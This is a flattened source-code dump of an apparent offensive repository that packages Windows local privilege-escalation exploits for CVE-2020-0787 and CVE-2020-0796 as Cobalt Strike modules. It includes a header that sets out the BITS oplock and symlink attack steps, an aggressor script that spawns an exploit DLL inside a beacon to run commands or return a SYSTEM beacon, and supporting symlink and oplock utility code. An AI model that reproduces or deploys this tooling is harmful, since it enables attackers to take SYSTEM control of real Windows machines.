├── CVE-2020-0787_CNA ├── BitsArbitraryFileMove.cpp ├── BitsArbitraryFileMove │ ├── BitsArbitraryFileMove.cpp │ ├── BitsArbitraryFileMove.h │ ├── BitsArbitraryFileMove.vcxproj │ ├── BitsArbitraryFileMove.vcxproj.filters │ ├── BitsArbitraryFileMove.vcxproj.user │ ├── CBitsCom.cpp │ └── CBitsCom.h ├── CVE_2020_0787.cna ├── CobaltStrikeShow.gif ├── CommonUtils │ ├── CommonUtils.cpp │ ├── CommonUtils.h │ ├── CommonUtils.vcxproj │ ├── CommonUtils.vcxproj.filters │ ├── CommonUtils.vcxproj.user │ ├── DirectoryObject.cpp │ ├── FileOpLock.cpp │ ├── FileOpLock.h │ ├── FileSymlink.cpp │ ├── FileSymlink.h │ ├── Hardlink.cpp │ ├── NativeSymlink.cpp │ ├── RegistrySymlink.cpp │ ├── ReparsePoint.cpp │ ├── ReparsePoint.h │ ├── ScopedHandle.cpp │ ├── ScopedHandle.h │ ├── ntimports.h │ ├── stdafx.cpp │ ├── stdafx.h │ ├── targetver.h │ └── typed_buffer.h ├── README.md ├── reflective_dll.sln ├── reflective_dll.vcproj ├── reflective_dll.vcxproj ├── reflective_dll.vcxproj.filters ├── reflective_dll.vcxproj.user └── src │ ├── BitsArbitraryFileMove.h │ ├── ReflectiveDLLInjection.h │ ├── ReflectiveDll.cpp │ ├── ReflectiveLoader.cpp │ └── ReflectiveLoader.h ├── CVE-2020-0796_CNA ├── CVE_2020_0796_CNA_4.0.cna ├── CVE_2020_0796_CNA_4.2.cna ├── README.md ├── images │ └── RUN.gif ├── reflective_dll.sln ├── reflective_dll.vcproj ├── reflective_dll.vcxproj ├── reflective_dll.vcxproj.filters ├── reflective_dll.vcxproj.user ├── src │ ├── ReflectiveDLLInjection.h │ ├── ReflectiveDll.c │ ├── ReflectiveLoader.c │ ├── ReflectiveLoader.h │ └── exploit.h └── x64 │ └── Release │ └── reflective_dll.x64.dll ├── ExitService ├── ExitService.cpp ├── ExitService.filters ├── ExitService.sln ├── ExitService.user ├── ExitService.vcxproj └── ExitService.vcxproj.user ├── LICENSE ├── README.md └── Service_Reflective_dll ├── README.md ├── Release └── readme.md ├── bin └── readme.md ├── dll ├── Release │ └── readme.md ├── reflective_dll.sln ├── reflective_dll.vcproj ├── reflective_dll.vcxproj ├── 
reflective_dll.vcxproj.filters ├── reflective_dll.vcxproj.user └── src │ ├── ReflectiveDLLInjection.h │ ├── ReflectiveDll.c │ ├── ReflectiveLoader.c │ └── ReflectiveLoader.h └── rdi.sln /CVE-2020-0787_CNA/BitsArbitraryFileMove.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0787_CNA/BitsArbitraryFileMove.cpp -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.cpp -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | /* 4 | 0) Prepare workspace 5 | Create C:\workspace\ 6 | Create C:\workspace\mountpoint\ 7 | Create C:\workspace\bait\ 8 | Create C:\workspace\FakeDll.dll 9 | 10 | C:\workspace 11 | |__ mountpoint 12 | |__ redir 13 | |__ FakeDll.dll 14 | 15 | 1) Create a mountpoint 16 | C:\workspace\mountpoint\ -> C:\workspace\bait\ 17 | 18 | 2) Create the group / job / add file / etc. 
19 | LocalFile = C:\workspace\mountpoint\test.txt 20 | 21 | At this point, a tmp file should have been created with user impersonation 22 | C:\workspace\bait\BITD857.tmp 23 | 24 | 3) Set an oplock on the tmp file 25 | C:\workspace\bait\BITD857.tmp 26 | 27 | 4) Resume the job 28 | The oplock will be triggered on the write operation as user 29 | 30 | 5) Switch the mountpoint and create symlinks 31 | C:\workspace\mountpoint\ -> \RPC Control 32 | \RPC Control\BITD857.tmp -> \??\C:\workspace\FakeDll.dll 33 | \RPC Control\test.txt -> \??\C:\Windows\System32\FakeDll.dll 34 | 35 | 6) Release the oplock 36 | The MoveFileW operation should be done as System 37 | */ 38 | #include 39 | #include 40 | #include 41 | 42 | #define DEBUG FALSE 43 | #define MAX_FILENAME 32 44 | #define MAX_MSG 1024 45 | 46 | class BitsArbitraryFileMove 47 | { 48 | private: 49 | BOOL m_bCustomSourceFile; 50 | WCHAR m_wszWorkspaceDirPath[MAX_PATH]; 51 | WCHAR m_wszMountpointDirPath[MAX_PATH]; 52 | WCHAR m_wszBaitDirPath[MAX_PATH]; 53 | WCHAR m_wszSourceFilePath[MAX_PATH]; 54 | WCHAR m_wszTargetFilePath[MAX_PATH]; 55 | WCHAR m_wszBitsLocalFileName[MAX_FILENAME]; 56 | WCHAR m_wszBitsTempFileName[MAX_FILENAME]; 57 | WCHAR m_wszBitsTempFilePath[MAX_PATH]; 58 | 59 | public: 60 | // Constructor / Destructor 61 | BitsArbitraryFileMove(); 62 | ~BitsArbitraryFileMove(); 63 | 64 | public: 65 | BOOL Run(LPCWSTR pwszDstFile); // e.g.: Destination="C:\Windows\System32\FakeDll.dll" 66 | 67 | BOOL Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile); // e.g.: Source="C:\Workspace\FakeDll.dll", Destination="C:\Windows\System32\FakeDll.dll" 68 | void PrintSuccess(LPCWSTR pwszMsg); 69 | 70 | private: 71 | BOOL PrepareWorkspace(); 72 | BOOL WriteSourceFile(); 73 | BOOL FindBitsTempFile(); 74 | BOOL TargetFileExists(); 75 | void CleanUp(); 76 | }; 77 | 78 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.vcxproj: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | ARM 7 | 8 | 9 | Debug 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | ARM 19 | 20 | 21 | Release 22 | Win32 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | 16.0 31 | {36C758EB-8C26-4DD6-915E-7030275418A5} 32 | Win32Proj 33 | BitsArbitraryFileMove 34 | 10.0 35 | 36 | 37 | 38 | v142 39 | StaticLibrary 40 | Unicode 41 | true 42 | 43 | 44 | v142 45 | StaticLibrary 46 | Unicode 47 | true 48 | 49 | 50 | v142 51 | 52 | 53 | v142 54 | Unicode 55 | StaticLibrary 56 | true 57 | 58 | 59 | v142 60 | Unicode 61 | StaticLibrary 62 | true 63 | 64 | 65 | v142 66 | Unicode 67 | StaticLibrary 68 | true 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | .lib 78 | $(SolutionDir)$(Configuration)\$(Platform)\ 79 | $(Configuration)\$(Platform)\ 80 | 81 | 82 | .lib 83 | 84 | 85 | .lib 86 | 87 | 88 | $(SolutionDir)$(Configuration)\$(Platform)\ 89 | $(Configuration)\$(Platform)\ 90 | 91 | 92 | $(Configuration)\$(Platform)\ 93 | $(SolutionDir)$(Configuration)\$(Platform)\ 94 | 95 | 96 | 97 | MultiThreaded 98 | true 99 | Level3 100 | true 101 | ..\CommonUtils 102 | 103 | 104 | 105 | 106 | MultiThreaded 107 | true 108 | Level3 109 | true 110 | ..\CommonUtils 111 | 112 | 113 | 114 | 115 | MultiThreaded 116 | true 117 | Level3 118 | true 119 | ..\CommonUtils 120 | 121 | 122 | 123 | 124 | MultiThreadedDebug 125 | Level3 126 | 127 | 128 | 129 | 130 | MultiThreadedDebug 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | {2aa6ab5e-18a8-49f4-b25d-587e8c3e4432} 144 | 145 | 146 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Fichiers sources 20 | 21 | 22 | Fichiers sources 23 | 24 | 25 | 26 | 27 | Fichiers d%27en-tête 28 | 29 | 30 | Fichiers d%27en-tête 31 | 32 | 33 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/CBitsCom.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0787_CNA/BitsArbitraryFileMove/CBitsCom.cpp -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/CBitsCom.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | //#define BITSCOM_GUID_GROUP { 0x63B45B2D, 0xA84B, 0x463E, { 0x9C, 0xD4, 0xC0, 0x48, 0xC1, 0xBF, 0x9E, 0x72 } } 10 | #define BITSCOM_GUID_GROUP { 0x63B45B2D, 0xA84B, 0x463E, { 0x9C, 0xD4, 0xC0, 0x48, 0xC1, 0xBF, 0x9E, 0x71 } } 11 | #define MAX_JOBSTATE_NAME 64 12 | 13 | enum PrepareJobError 14 | { 15 | BITSCOM_ERR_SUCCESS, 16 | BITSCOM_ERR_COCREATEINSTANCE_BCQMGR, 17 | BITSCOM_ERR_CREATEGROUP, 18 | BITSCOM_ERR_GETGROUP, 19 | BITSCOM_ERR_CANCELGROUP, 20 | BITSCOM_ERR_CREATEJOB, 21 | BITSCOM_ERR_GETJOB, 22 | BITSCOM_ERR_RESUMEJOB, 23 | BITSCOM_ERR_JOB, 24 | BITSCOM_ERR_COMPLETEJOB, 25 | BITSCOM_ERR_ALLOC_FILESETINFO, 26 | 
BITSCOM_ERR_ALLOC_ADDFILES, 27 | BITSCOM_ERR_QUERYNEWJOBINTERFACE, 28 | BITSCOM_ERR_JOBINTERFACECAST, 29 | BITSCOM_ERR_NEWJOBINTERFACEISNULL 30 | }; 31 | 32 | class CBitsCom 33 | { 34 | private: 35 | GUID m_guidGroup; 36 | GUID m_guidJob; 37 | IBackgroundCopyQMgr* m_pBackgroundCopyQMgr; 38 | IBackgroundCopyGroup* m_pBackgroundCopyGroup; 39 | IBackgroundCopyJob1* m_pBackgroundCopyJob1; 40 | CComPtr m_pUnkNewJobInterface; 41 | 42 | public: 43 | CBitsCom(); 44 | ~CBitsCom(); 45 | 46 | public: 47 | DWORD PrepareJob(LPCWSTR pwszJobLocalFilename); 48 | DWORD ResumeJob(); 49 | DWORD CompleteJob(); 50 | 51 | private: 52 | BOOL GetJobStateName(BG_JOB_STATE bgJobState, LPWSTR pwszJobName); 53 | }; 54 | 55 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CVE_2020_0787.cna: -------------------------------------------------------------------------------- 1 | sub getnow { 2 | return (formatDate("yyyy/MM/dd HH:mm:ss")); 3 | } 4 | sub CVE_2020_0787 { 5 | $Dialog = dialog("CVE_2020_0787-Execute",%(program => "cmd.exe" , parameters => "/c whoami" , bid => $1 , listener => $2),lambda({ 6 | local('$program $parameters $Action $user $bid $arch $dll $cmdline'); 7 | $bid = $3['bid']; 8 | $program = $3['program']; 9 | $listener = $3['listener']; 10 | $parameters = $3['parameters']; 11 | $Action = $3['Action']; 12 | blog($bid, "-------".getnow()."-------"); 13 | if($Action eq "Execute"){ 14 | $cmdline = "1|".$program."|".$parameters. " \> \\\\\\\\.\\\\pipe\\\\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16"; 15 | }else if($Action eq "Beacon"){ 16 | $cmdline = "2|".$program."|".$parameters; 17 | } 18 | 19 | $cmdline = replace($cmdline,":\/",":\/\/"); 20 | blog($bid, "Run: \c4 $cmdline \o"); 21 | btask($bid, "Task Beacon to run " . listener_describe($listener) . 
" via CVE-2020-0787"); #KB4551762 22 | 23 | if(binfo($bid, "arch") eq "x86"){ 24 | blog($bid,"Beacon Arch is x86"); 25 | $dll = getFileProper(script_resource("PrivilegeEscalation/ReflectionDLL/"), "CVE_2020_0787_x86.dll"); 26 | }else if (binfo($bid, "arch") eq "x64"){ 27 | blog($bid,"Beacon Arch is x64"); 28 | $dll = getFileProper(script_resource("PrivilegeEscalation/ReflectionDLL/"), "CVE_2020_0787_x64.dll"); 29 | }else{ 30 | berror($bid,"Not Found Arch!"); 31 | return; 32 | } 33 | bdllspawn!($bid, $dll,$cmdline, "Elevation of local privileges", 5000); 34 | },$1 => $1 )); 35 | dialog_description($Dialog, "WARNING! Must be readme before execution.
Action-Execute:Result for command
Action-Beacon:Return Beacon And No Result
-Inputing in Parameters:
--Eg: /c C://Users//A//AppData//Local//B.exe
--Eg: /c C:\\\\\\\\Users\\\\\\\\beacon.exe"); 36 | drow_text($Dialog, "program", "Program:"); 37 | drow_text($Dialog, "parameters", "Parameters:"); 38 | drow_combobox($Dialog, "Action", "Action: ", @("Execute","Beacon")); 39 | dbutton_action($Dialog, "Execute"); 40 | dialog_show($Dialog); 41 | } 42 | beacon_exploit_register("CVE_2020_0787", "CVE_2020_0787", &CVE_2020_0787); -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CobaltStrikeShow.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0787_CNA/CobaltStrikeShow.gif -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/CommonUtils.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include "CommonUtils.h" 17 | #include 18 | #include "ntimports.h" 19 | 20 | void __stdcall my_puts(const char* str) 21 | { 22 | fwrite(str, 1, strlen(str), stdout); 23 | } 24 | 25 | static console_output _pout = my_puts; 26 | 27 | void DebugSetOutput(console_output pout) 28 | { 29 | _pout = pout; 30 | } 31 | 32 | void DebugPrintf(const char* lpFormat, ...) 
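{
    CHAR buf[1024];
    va_list va;

    va_start(va, lpFormat);
    // StringCbVPrintfA always NUL-terminates inside sizeof(buf); longer output is truncated.
    StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
    va_end(va);  // every va_start needs a matching va_end (was missing)

    _pout(buf);
}

/// Returns the system message text for a Win32 error code.
/// @param dwError  Win32 error code, typically from GetLastError().
/// @return The text produced by FormatMessage, or the error code itself as decimal text
///         when no message could be produced (the reason is printed to stdout).
std::wstring GetErrorMessage(DWORD dwError)
{
    LPWSTR pBuffer = nullptr;

    // FORMAT_MESSAGE_ALLOCATE_BUFFER makes the API LocalAlloc the buffer and store its
    // address through the LPWSTR* cast; the size argument is then the minimum allocation.
    DWORD dwSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS |
        FORMAT_MESSAGE_ALLOCATE_BUFFER, 0, dwError, 0, reinterpret_cast<LPWSTR>(&pBuffer), 32 * 1024, nullptr);

    if (dwSize > 0 && pBuffer != nullptr)
    {
        std::wstring ret = pBuffer;
        LocalFree(pBuffer);
        return ret;
    }

    // Read the failure reason before any other call can overwrite it.
    DWORD dwFormatError = GetLastError();
    // DWORD is unsigned: %lu keeps codes >= 0x80000000 from printing as negative numbers.
    printf("Error getting message %lu\n", dwFormatError);
    WCHAR buf[64];
    StringCchPrintf(buf, _countof(buf), L"%lu", dwError);
    return buf;
}

/// Convenience overload: message text for the calling thread's last Win32 error.
std::wstring GetErrorMessage()
{
    return GetErrorMessage(GetLastError());
}

/// Enables or disables a single named privilege on an access token.
/// @param hToken            Token opened with TOKEN_ADJUST_PRIVILEGES access.
/// @param lpszPrivilege     Privilege name (an SE_*_NAME constant).
/// @param bEnablePrivilege  TRUE to enable, FALSE to disable.
/// @return TRUE only when the privilege was adjusted. FALSE when the name is unknown, when
///         AdjustTokenPrivileges fails, or when the token does not hold the privilege at all
///         (ERROR_NOT_ALL_ASSIGNED); GetLastError() carries the reason.
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
    LUID luid{};
    if (!LookupPrivilegeValue(nullptr, lpszPrivilege, &luid))
    {
        return FALSE;
    }

    TOKEN_PRIVILEGES tp{};
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), nullptr, nullptr))
    {
        return FALSE;
    }

    // AdjustTokenPrivileges reports success even when nothing was adjusted; the last
    // error distinguishes the two cases.
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
    {
        return FALSE;
    }

    return TRUE;
}

/// Maps an NTSTATUS to the equivalent Win32 error code via ntdll!RtlNtStatusToDosError.
DWORD NtStatusToDosError(NTSTATUS status)
{
    DEFINE_NTDLL(RtlNtStatusToDosError);
    return fRtlNtStatusToDosError(status);
}

/// Stores the Win32 equivalent of an NTSTATUS as the calling thread's last error.
void SetNtLastError(NTSTATUS status)
{
    SetLastError(NtStatusToDosError(status));
}

/// Resolves an export of the already-loaded ntdll; nullptr if the name is not exported.
FARPROC GetProcAddressNT(LPCSTR lpName)
{
    return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
}

/// Opens a file or directory with NtOpenFile using a native (NT object-manager) path.
/// @param path            NT path, or nullptr to open the object identified by `root` alone.
/// @param root            Optional directory handle that a relative `path` is resolved against.
/// @param desired_access  ACCESS_MASK for the open.
/// @param share_access    FILE_SHARE_* flags.
/// @param open_options    FILE_* open options passed straight to NtOpenFile.
/// @return The opened handle, or nullptr with GetLastError() set from the NTSTATUS.
HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options)
{
    DEFINE_NTDLL(RtlInitUnicodeString);
    DEFINE_NTDLL(NtOpenFile);

    UNICODE_STRING name = { 0 };
    OBJECT_ATTRIBUTES obj_attr = { 0 };

    if (path)
    {
        fRtlInitUnicodeString(&name, path);
        InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
    }
    else
    {
        // No name given: only the root handle identifies the object to open.
        InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr);
    }

    HANDLE h = nullptr;
    IO_STATUS_BLOCK io_status = { 0 };
    NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options);
    if (!NT_SUCCESS(status))
    {
        SetNtLastError(status);
        return nullptr;
    }
    return h;
}

/// Expands `path` to a fully qualified Win32 path, optionally prefixed with "\??\" so it
/// can be used as a native NT path.
/// @param path    Relative or absolute Win32 path.
/// @param native  When true, prepend "\??\" to the result.
/// @return The expanded path. If expansion fails, or the expansion would not fit in
///         MAX_PATH characters, `path` is appended unchanged after the optional prefix.
std::wstring BuildFullPath(const std::wstring& path, bool native)
{
    std::wstring ret;
    if (native)
    {
        ret = L"\\??\\";
    }

    WCHAR buf[MAX_PATH];
    // Success is 0 < len < MAX_PATH. A return of 0 is failure; a return >= MAX_PATH is the
    // size the call needed, in which case buf was not written and must not be read.
    DWORD len = GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr);
    if (len > 0 && len < MAX_PATH)
    {
        ret += buf;
    }
    else
    {
        ret += path;
    }

    return ret;
}
// --------------------------------------------------------------------------------
// /CVE-2020-0787_CNA/CommonUtils/CommonUtils.h:
// --------------------------------------------------------------------------------
#pragma once

#include // <header name lost in page extraction>
#include // <header name lost in page extraction>

typedef void(__stdcall *console_output)(const char*);

void DebugSetOutput(console_output pout);
void DebugPrintf(const char* lpFormat, ...);
HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname);
HANDLE OpenSymlink(HANDLE root, LPCWSTR linkname);
HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow);
HANDLE OpenObjectDirectory(HANDLE hRoot,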
LPCWSTR dirname); 14 | std::wstring GetErrorMessage(DWORD dwError); 15 | std::wstring GetErrorMessage(); 16 | BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege); 17 | bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile); 18 | bool DeleteRegSymlink(LPCWSTR lpSymlink); 19 | DWORD NtStatusToDosError(NTSTATUS status); 20 | bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname); 21 | HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options); 22 | std::wstring BuildFullPath(const std::wstring& path, bool native); -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/CommonUtils.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | ARM 7 | 8 | 9 | Debug 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | ARM 19 | 20 | 21 | Release 22 | Win32 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432} 31 | Win32Proj 32 | CommonUtils 33 | 10.0.18362.0 34 | 35 | 36 | 37 | v142 38 | StaticLibrary 39 | Unicode 40 | true 41 | 42 | 43 | v142 44 | StaticLibrary 45 | Unicode 46 | true 47 | 48 | 49 | v142 50 | 51 | 52 | v142 53 | Unicode 54 | true 55 | StaticLibrary 56 | 57 | 58 | v142 59 | Unicode 60 | true 61 | StaticLibrary 62 | 63 | 64 | v142 65 | Unicode 66 | true 67 | StaticLibrary 68 | 69 | 70 | 71 | 72 | 73 | 74 | .lib 75 | $(SolutionDir)$(Configuration)\$(Platform)\ 76 | $(Configuration)\$(Platform)\ 77 | 78 | 79 | .lib 80 | $(Configuration)\$(Platform)\ 81 | $(SolutionDir)$(Configuration)\$(Platform)\ 82 | 83 | 84 | .lib 85 | 86 | 87 | $(Configuration)\$(Platform)\ 88 | $(SolutionDir)$(Configuration)\$(Platform)\ 89 | 90 | 91 | $(SolutionDir)$(Configuration)\$(Platform)\ 92 | $(Configuration)\$(Platform)\ 93 | 94 | 95 | 96 | Level3 97 | 98 | 99 | 100 | 101 | Level3 102 | 103 | 104 | 105 
| 106 | Level3 107 | 108 | 109 | 110 | 111 | true 112 | MultiThreaded 113 | true 114 | 115 | 116 | 117 | 118 | true 119 | MultiThreaded 120 | true 121 | 122 | 123 | 124 | 125 | true 126 | MultiThreaded 127 | true 128 | 129 | 130 | 131 | 132 | Level3 133 | 134 | 135 | 136 | 137 | true 138 | MultiThreadedDebug 139 | 140 | 141 | 142 | 143 | MultiThreadedDebug 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/CommonUtils.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files 44 | 45 | 46 | 47 | 48 | Source Files 49 | 50 | 51 | Source Files 52 | 53 | 54 | Source Files 55 | 56 | 57 | Source Files 58 | 59 | 60 | Source Files 61 | 62 | 63 | Source Files 64 | 65 | 66 | Source Files 67 | 68 | 69 | Source Files 70 | 71 | 72 | Source Files 73 | 74 | 75 | Source Files 76 | 77 | 78 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/CommonUtils.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- 
// /CVE-2020-0787_CNA/CommonUtils/DirectoryObject.cpp:
// --------------------------------------------------------------------------------
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

#include "stdafx.h"
#include "CommonUtils.h"
#include "ntimports.h"

/// Creates an object-manager directory with NtCreateDirectoryObjectEx.
/// @param hRoot    Directory the name is relative to (may be nullptr).
/// @param dirname  Name of the new directory, or nullptr for an unnamed object.
/// @param hShadow  Shadow directory handle forwarded to the call (may be nullptr).
/// @return Handle with DIRECTORY_ALL_ACCESS, or nullptr with GetLastError() set from the
///         NTSTATUS. Only STATUS_SUCCESS (0) counts as success here.
HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow)
{
    DEFINE_NTDLL(RtlInitUnicodeString);
    DEFINE_NTDLL(NtCreateDirectoryObjectEx);

    UNICODE_STRING obj_name;
    UNICODE_STRING* pName = nullptr;
    if (dirname != nullptr)
    {
        fRtlInitUnicodeString(&obj_name, dirname);
        pName = &obj_name;
    }

    OBJECT_ATTRIBUTES obj_attr;
    InitializeObjectAttributes(&obj_attr, pName, OBJ_CASE_INSENSITIVE, hRoot, nullptr);

    HANDLE hDir = nullptr;
    const NTSTATUS status = fNtCreateDirectoryObjectEx(&hDir, DIRECTORY_ALL_ACCESS, &obj_attr, hShadow, FALSE);
    // NOTE(review): a positive (informational) status would be treated as failure while
    // hDir may already be valid; none is expected from this call — confirm.
    if (status != 0)
    {
        SetLastError(NtStatusToDosError(status));
        return nullptr;
    }
    return hDir;
}

/// Opens an existing object-manager directory with NtOpenDirectoryObject.
/// @param hRoot    Directory the name is relative to (may be nullptr).
/// @param dirname  Name of the directory to open; must not be nullptr.
/// @return Handle opened with MAXIMUM_ALLOWED, or nullptr with GetLastError() set from
///         the NTSTATUS. Only STATUS_SUCCESS (0) counts as success here.
HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR dirname)
{
    DEFINE_NTDLL(RtlInitUnicodeString);
    DEFINE_NTDLL(NtOpenDirectoryObject);

    UNICODE_STRING obj_name;
    fRtlInitUnicodeString(&obj_name, dirname);

    OBJECT_ATTRIBUTES obj_attr;
    InitializeObjectAttributes(&obj_attr, &obj_name, OBJ_CASE_INSENSITIVE, hRoot, nullptr);

    HANDLE hDir = nullptr;
    const NTSTATUS status = fNtOpenDirectoryObject(&hDir, MAXIMUM_ALLOWED, &obj_attr);
    if (status != 0)
    {
        SetLastError(NtStatusToDosError(status));
        return nullptr;
    }
    return hDir;
}
// --------------------------------------------------------------------------------
// /CVE-2020-0787_CNA/CommonUtils/FileOpLock.cpp:
// --------------------------------------------------------------------------------
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
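#include "stdafx.h"
#include "FileOpLock.h"
#include // <header name lost in page extraction>

void DebugPrintf(LPCSTR lpFormat, ...);

/// Fills in the oplock request/response buffers; nothing is opened until BeginLock().
/// @param cb  Callback run on a thread-pool thread when the oplock breaks (may be nullptr).
FileOpLock::FileOpLock(UserCallback cb):
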